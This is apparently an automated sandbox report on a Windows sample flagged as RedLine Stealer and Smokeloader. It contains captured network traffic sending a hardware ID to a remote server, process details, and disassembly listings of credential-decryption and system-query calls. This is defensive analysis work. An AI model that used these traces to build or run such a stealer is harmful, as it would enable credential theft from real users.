                                                                                                                                                                                                                                                              2024-12-26 11:57:25 UTC15331OUTData Raw: 2d 2d 4b 50 59 37 4e 58 51 47 4d 51 4c 51 41 43 55 4d 53 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 39 44 44 36 33 42 43 46 34 38 39 30 46 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 50 59 37 4e 58 51 47 4d 51 4c 51 41 43 55 4d 53 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 50 59 37 4e 58 51 47 4d 51 4c 51 41 43 55 4d 53 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 4b
                                                                                                                                                                                                                                                              Data Ascii: --KPY7NXQGMQLQACUMS9Content-Disposition: form-data; name="hwid"09DD63BCF4890FFCAC8923850305D13E--KPY7NXQGMQLQACUMS9Content-Disposition: form-data; name="pid"3--KPY7NXQGMQLQACUMS9Content-Disposition: form-data; name="lid"4h5VfH----K
                                                                                                                                                                                                                                                              2024-12-26 11:57:25 UTC4906OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                                                                                                                                                                                                                              2024-12-26 11:57:26 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Thu, 26 Dec 2024 11:57:26 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=qj4vtv4vdi4k8rv2vhirph1k7v; expires=Mon, 21 Apr 2025 05:44:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o6MOWFQzSXBJV2A9aNKQfW93lc%2FPjOgDUjPnbk0IBzinW%2F0ncJpzBs0sPS1O%2BXnyC0U0pPbaUDDaadVRZJwgsYnVW6AqMNOCDal8K2RtahqNt5lgFDw8Yd1hTs8Ks1XElf0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f80e4aacd755e76-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1716&rtt_var=670&sent=11&recv=27&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21198&delivery_rate=1601755&cwnd=209&unsent_bytes=0&cid=5180480108fc2db0&ts=974&x=0"
                                                                                                                                                                                                                                                              2024-12-26 11:57:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-26 11:57:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:06:57:06
                                                                                                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\SPFFah2O2q.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\SPFFah2O2q.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:316'928 bytes
                                                                                                                                                                                                                                                              MD5 hash:D4D4B5B6CA79BB5B57E8EF3791629E47
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1722412139.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                              Start time:06:57:26
                                                                                                                                                                                                                                                              Start date:26/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 1812
                                                                                                                                                                                                                                                              Imagebase:0x3d0000
                                                                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:3.6%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:16.5%
                                                                                                                                                                                                                                                                Signature Coverage:43.8%
                                                                                                                                                                                                                                                                Total number of Nodes:176
                                                                                                                                                                                                                                                                Total number of Limit Nodes:9
                                                                                                                                                                                                                                                                execution_graph 26122 41f7a0 26123 41f7d0 26122->26123 26123->26123 26124 4218a0 3 API calls 26123->26124 26125 41f7f9 26124->26125 25990 40c583 CoInitializeSecurity 26131 43c767 26132 43c790 26131->26132 26132->26132 26133 43c80e 26132->26133 26135 43c1f0 LdrInitializeThunk 26132->26135 26135->26133 26136 43cce6 26137 43cd00 26136->26137 26139 43cd6e 26137->26139 26143 43c1f0 LdrInitializeThunk 26137->26143 26142 43c1f0 LdrInitializeThunk 26139->26142 26141 43ce4d 26142->26141 26143->26139 25991 43c58a 25993 43c460 25991->25993 25992 43c5f4 25993->25992 25996 43c1f0 LdrInitializeThunk 25993->25996 25995 43c54d 25996->25995 26144 4217ab 26145 4217d0 26144->26145 26145->26145 26146 4218a0 3 API calls 26145->26146 26147 42180b 26146->26147 26148 4218a0 3 API calls 26147->26148 26149 42182a 26148->26149 25997 43c2c8 25998 43c2e0 25997->25998 25998->25998 25999 43ccaf GetForegroundWindow 25998->25999 26000 43ccbe 25999->26000 26001 20c0000 26004 20c0006 26001->26004 26005 20c0015 26004->26005 26008 20c07a6 26005->26008 26009 20c07c1 26008->26009 26010 20c07ca CreateToolhelp32Snapshot 26009->26010 26011 20c07e6 Module32First 26009->26011 26010->26009 26010->26011 26012 20c0005 26011->26012 26013 20c07f5 26011->26013 26015 20c0465 26013->26015 26016 20c0490 26015->26016 26017 20c04d9 26016->26017 26018 20c04a1 VirtualAlloc 26016->26018 26017->26017 26018->26017 26019 40d38e 26020 40d3b0 26019->26020 26023 437df0 26020->26023 26022 40d4e2 26022->26022 26024 437e10 CoCreateInstance 26023->26024 26026 438042 SysAllocString 26024->26026 26027 438440 26024->26027 26030 4380e7 26026->26030 26028 438450 GetVolumeInformationW 26027->26028 26036 438471 26028->26036 26031 43842f SysFreeString 26030->26031 26032 4380ef CoSetProxyBlanket 26030->26032 26031->26027 26033 438425 26032->26033 26034 43810f SysAllocString 26032->26034 26033->26031 26037 438200 26034->26037 26036->26022 26036->26036 26037->26037 26038 438237 SysAllocString 26037->26038 26040 43825b 26038->26040 26039 438413 SysFreeString SysFreeString 26039->26033 26040->26039 26041 438409 26040->26041 26042 4382a3 VariantInit 26040->26042 26041->26039 26044 4382f0 26042->26044 26043 4383f8 VariantClear 26043->26041 26044->26043 26045 408850 26047 40885f 26045->26047 26046 408acf ExitProcess 26047->26046 26048 408ab8 26047->26048 26049 40891c GetCurrentProcessId GetCurrentThreadId 26047->26049 26052 408ab3 26048->26052 26050 408941 26049->26050 26051 408945 SHGetSpecialFolderPathW GetForegroundWindow 26049->26051 26050->26051 26053 408a3d 26051->26053 26052->26046 26052->26048 26053->26048 26055 40c550 CoInitializeEx 26053->26055 26056 421853 26057 421860 26056->26057 26057->26057 26060 4218a0 26057->26060 26061 4218b7 26060->26061 26076 43e340 26061->26076 26063 421880 26064 42191d 26064->26063 26080 43aa80 26064->26080 26066 421963 26075 4219fc 26066->26075 26083 43c1f0 LdrInitializeThunk 26066->26083 26068 421ff5 26069 43aaa0 RtlFreeHeap 26068->26069 26071 422007 26069->26071 26070 43aa80 RtlAllocateHeap 26070->26075 26071->26063 26089 43c1f0 LdrInitializeThunk 26071->26089 26075->26068 26075->26070 26084 43c1f0 LdrInitializeThunk 26075->26084 26085 43aaa0 26075->26085 26077 43e360 26076->26077 26077->26077 26078 43e4be 26077->26078 26090 43c1f0 LdrInitializeThunk 26077->26090 26078->26064 26091 43d810 26080->26091 26082 43aa8a RtlAllocateHeap 26082->26066 26083->26066 26084->26075 26086 43aab3 26085->26086 26087 43aac4 26085->26087 26088 43aab8 RtlFreeHeap 26086->26088 26087->26075 26088->26087 26089->26071 26090->26078 26092 43d830 26091->26092 26092->26082 26092->26092 26150 435972 26151 43599b 26150->26151 26153 4359c4 26151->26153 26154 43c1f0 LdrInitializeThunk 26151->26154 26154->26151 26155 4214b0 26156 4214be 26155->26156 26158 421510 26155->26158 26159 4215d0 26156->26159 26160 4215e0 26159->26160 26160->26160 26163 43e510 26160->26163 26162 4216df 26164 43e530 26163->26164 26165 43e68e 26164->26165 26167 43c1f0 LdrInitializeThunk 26164->26167 26165->26162 26167->26165 26168 20f003c 26169 20f0049 26168->26169 26183 20f0e0f SetErrorMode SetErrorMode 26169->26183 26174 20f0265 26175 20f02ce VirtualProtect 26174->26175 26177 20f030b 26175->26177 26176 20f0439 VirtualFree 26181 20f04be 26176->26181 26182 20f05f4 LoadLibraryA 26176->26182 26177->26176 26178 20f04e3 LoadLibraryA 26178->26181 26180 20f08c7 26181->26178 26181->26182 26182->26180 26184 20f0223 26183->26184 26185 20f0d90 26184->26185 26186 20f0dad 26185->26186 26187 20f0dbb GetPEB 26186->26187 26188 20f0238 VirtualAlloc 26186->26188 26187->26188 26188->26174 26189 40d835 26190 40d71d 26189->26190 26190->26190 26191 40d7ee 26190->26191 26193 43c1f0 LdrInitializeThunk 26190->26193 26193->26191 26093 415799 26094 41579e 26093->26094 26103 43e6e0 26094->26103 26096 4157b7 26098 4157f8 26096->26098 26107 43e7d0 26096->26107 26102 4158fe 26098->26102 26113 43c1f0 LdrInitializeThunk 26098->26113 26100 415bc6 26101 415b95 CryptUnprotectData 26101->26100 26102->26100 26102->26101 26105 43e700 26103->26105 26104 43e77e 26104->26096 26105->26104 26114 43c1f0 LdrInitializeThunk 26105->26114 26108 43e800 26107->26108 26111 43e87f 26108->26111 26115 43c1f0 LdrInitializeThunk 26108->26115 26109 43e94e 26109->26098 26111->26109 26116 43c1f0 LdrInitializeThunk 26111->26116 26113->26102 26114->26104 26115->26111 26116->26109 26117 43cb19 26119 43cb40 26117->26119 26118 43cbae 26119->26118 26121 43c1f0 LdrInitializeThunk 26119->26121 26121->26118 26194 40a03d 26195 40a130 26194->26195 26195->26195 26198 40acf0 26195->26198 26197 40a17f 26199 40ad80 26198->26199 26201 40ada5 26199->26201 26202 43c180 26199->26202 26201->26197 26203 43c1d0 26202->26203 26204 43c1ba 26202->26204 26205 43c1d6 26202->26205 26206 43c198 26202->26206 26207 43c1c0 26202->26207 26210 43c1a6 26202->26210 26208 43aaa0 RtlFreeHeap 26203->26208 26211 43aa80 RtlAllocateHeap 26204->26211 26209 43aaa0 RtlFreeHeap 26205->26209 26206->26203 26206->26205 26206->26207 26206->26210 26207->26199 26208->26205 26212 43c1df 26209->26212 26213 43c1ab RtlReAllocateHeap 26210->26213 26211->26207 26213->26207

                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                Function 00437DF0 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 640memorycomCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 0 437df0-437e0f 1 437e10-437e24 0->1 1->1 2 437e26-437e34 1->2 3 437e40-437e54 2->3 3->3 4 437e56-437e97 3->4 5 437ea0-437ec5 4->5 5->5 6 437ec7-437ede 5->6 8 437f92-437f9f 6->8 9 437ee4-437eef 6->9 11 437fa0-437fe0 8->11 10 437ef0-437f22 9->10 10->10 12 437f24-437f37 10->12 11->11 13 437fe2-43803c CoCreateInstance 11->13 14 437f40-437f82 12->14 15 438042-43807b 13->15 16 438440-43846f call 43dbf0 GetVolumeInformationW 13->16 14->14 18 437f84-437f8e 14->18 19 438080-4380bc 15->19 22 438471-438475 16->22 23 438479-43847b 16->23 18->8 19->19 21 4380be-4380e9 SysAllocString 19->21 28 43842f-43843c SysFreeString 21->28 29 4380ef-438109 CoSetProxyBlanket 21->29 22->23 24 43848d-438494 23->24 26 4384a0-4384b6 24->26 27 438496-43849d 24->27 32 4384c0-4384f0 26->32 27->26 28->16 30 438425-43842b 29->30 31 43810f-438121 29->31 30->28 33 438130-438177 31->33 32->32 34 4384f2-43852b 32->34 33->33 35 438179-4381f2 SysAllocString 33->35 36 438530-438573 34->36 37 438200-438235 35->37 36->36 38 438575-4385a5 call 41e5c0 36->38 37->37 39 438237-438261 SysAllocString 37->39 42 4385b0-4385b8 38->42 45 438413-438423 SysFreeString * 2 39->45 46 438267-438289 39->46 42->42 44 4385ba-4385bc 42->44 47 4385c2-4385d2 call 4081b0 44->47 48 438480-438487 44->48 45->30 53 438409-43840f 46->53 54 43828f-438292 46->54 47->48 48->24 50 4385d7-4385de 48->50 53->45 54->53 55 438298-43829d 54->55 55->53 56 4382a3-4382ef VariantInit 55->56 57 4382f0-438319 56->57 57->57 58 43831b-43832d 57->58 59 438331-438333 58->59 60 438339-43833f 59->60 61 4383f8-438405 VariantClear 59->61 60->61 62 438345-438353 60->62 61->53 63 438355-43835a 62->63 64 43838d 62->64 65 43836c-438370 63->65 66 43838f-4383b7 call 408020 call 408d50 64->66 67 438372-43837b 65->67 68 438360 65->68 77 4383b9 66->77 78 4383be-4383ca 66->78 71 438382-438386 67->71 72 43837d-438380 67->72 70 438361-43836a 68->70 70->65 70->66 71->70 74 438388-43838b 71->74 72->70 74->70 77->78 79 4383d1-4383f4 call 408050 call 408030 78->79 80 4383cc 78->80 79->61 80->79
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32()\"^), ref: 004380C3
                                                                                                                                                                                                                                                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32()\"^), ref: 0043817E
                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32()\"^), ref: 00438238
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004383F9
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0043841D
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00438423
                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00438430
                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,66966446,00000000,00000000,00000000,00000000), ref: 00438468
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                                                                                • String ID: P%R$)\"^$.H4J$O@$pq
                                                                                                                                                                                                                                                                • API String ID: 2573436264-1397720406
                                                                                                                                                                                                                                                                • Opcode ID: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
                                                                                                                                                                                                                                                                • Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96
                                                                                                                                                                                                                                                                Function 00415799 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 492encryptionCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 85 415799-4157cc call 408030 call 43e6e0 90 415850 85->90 91 4157d3-4157f3 call 408020 call 43e7d0 85->91 92 415852-415869 85->92 93 415842-415847 85->93 94 415807 85->94 95 415839-41583f call 408030 85->95 96 415818-41582c call 401000 85->96 90->92 109 4157f8-415800 91->109 99 415870-4158cb 92->99 93->90 94->96 95->93 96->95 99->99 103 4158cd-4158d5 99->103 106 4158d7-4158e6 103->106 107 41591a-41597b call 401a90 103->107 110 4158f0-4158f7 106->110 114 415980-4159b4 107->114 109->90 109->92 109->93 109->94 109->95 109->96 112 415900-415906 110->112 113 4158f9-4158fc 110->113 112->107 116 415908-415917 call 43c1f0 112->116 113->110 115 4158fe 113->115 114->114 117 4159b6-4159d3 call 401dd0 114->117 115->107 116->107 122 415d60 117->122 123 415bc6-415bcb 117->123 124 415d46-415d5f call 43dbf0 117->124 125 415d66 117->125 126 415d7a-415ddf 117->126 127 4159da-4159df 117->127 128 415d3d-415d43 call 408030 117->128 129 415d6c-415d78 call 408030 117->129 131 415bd0-415bd9 123->131 124->122 132 415de0-415dfa 126->132 133 4159e0-4159e6 127->133 128->124 129->126 131->131 137 415bdb-415be2 131->137 132->132 138 415dfc-415e16 call 401dd0 132->138 133->133 139 4159e8-415a07 133->139 142 415be4-415be9 137->142 143 415c06 137->143 138->122 138->123 138->124 138->125 138->126 138->128 138->129 145 415a09-415a0c 139->145 146 415a0e 139->146 148 415c09-415c4b call 408020 142->148 143->148 145->146 150 415a0f-415a28 145->150 146->150 157 415c50-415cb6 148->157 152 415a2a-415a2d 150->152 153 415a2f 150->153 152->153 155 415a30-415a4e call 408020 152->155 153->155 162 415a54-415a5b 155->162 163 415b59-415bbf call 43dbf0 CryptUnprotectData 155->163 157->157 159 415cb8-415cc7 157->159 160 415ce1-415cf8 159->160 161 415cc9-415ccf 159->161 165 415d21-415d37 call 408cb0 160->165 166 415cfa-415d01 160->166 164 415cd0-415cdf 161->164 167 415a80-415aca call 41dae0 * 2 162->167 163->122 163->123 163->124 163->125 163->126 163->128 163->129 164->160 164->164 165->128 169 415d10-415d1f 166->169 177 415a70-415a7a 167->177 178 415acc-415ae7 call 41dae0 167->178 169->165 169->169 177->163 177->167 178->177 181 415ae9-415b11 178->181 182 415a61-415a65 181->182 183 415b17-415b2d call 41dae0 181->183 182->177 186 415b33-415b54 183->186 187 415a5d 183->187 186->177 187->182
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415BAF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                                                                                                                                                                • String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
                                                                                                                                                                                                                                                                • API String ID: 834300711-3328159043
                                                                                                                                                                                                                                                                • Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                                                                                                                                                                                                                                • Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86
                                                                                                                                                                                                                                                                Function 00409580 Relevance: 9.2, Strings: 7, Instructions: 442COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 272 409580-40958e 273 409aa4 272->273 274 409594-4095ff call 405ee0 call 408020 272->274 276 409aa6-409ab2 273->276 280 409600-409636 274->280 280->280 281 409638-40965f call 408f50 280->281 284 409660-4096af 281->284 284->284 285 4096b1-4096e3 call 408f50 284->285 288 4096f0-40975c 285->288 288->288 289 40975e-409794 call 408f50 288->289 292 4097a0-4097b0 289->292 292->292 293 4097b2-4097bf 292->293 294 4097c0-4097d4 293->294 294->294 295 4097d6-4097f6 call 408f50 294->295 298 409800-40985c 295->298 298->298 299 40985e-409932 call 4091b0 298->299 302 409940-409968 299->302 302->302 303 40996a-409972 302->303 304 409992-40999e 303->304 305 409974-40997f 303->305 307 4099a0-4099a3 304->307 308 4099c2-4099f2 304->308 306 409980-409990 305->306 306->304 306->306 309 4099b0-4099c0 307->309 310 409a00-409a5a 308->310 309->308 309->309 310->310 311 409a5c-409a78 call 40bbd0 310->311 313 409a7d-409aa2 call 408030 311->313 313->276
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #4<7$+8=>$09DD63BCF4890FFCAC8923850305D13E$PK$Tiec$\$r
                                                                                                                                                                                                                                                                • API String ID: 0-4188866626
                                                                                                                                                                                                                                                                • Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                                                                                                                                                                                                • Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46
                                                                                                                                                                                                                                                                Function 0040ACF0 Relevance: 9.2, Strings: 7, Instructions: 430COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
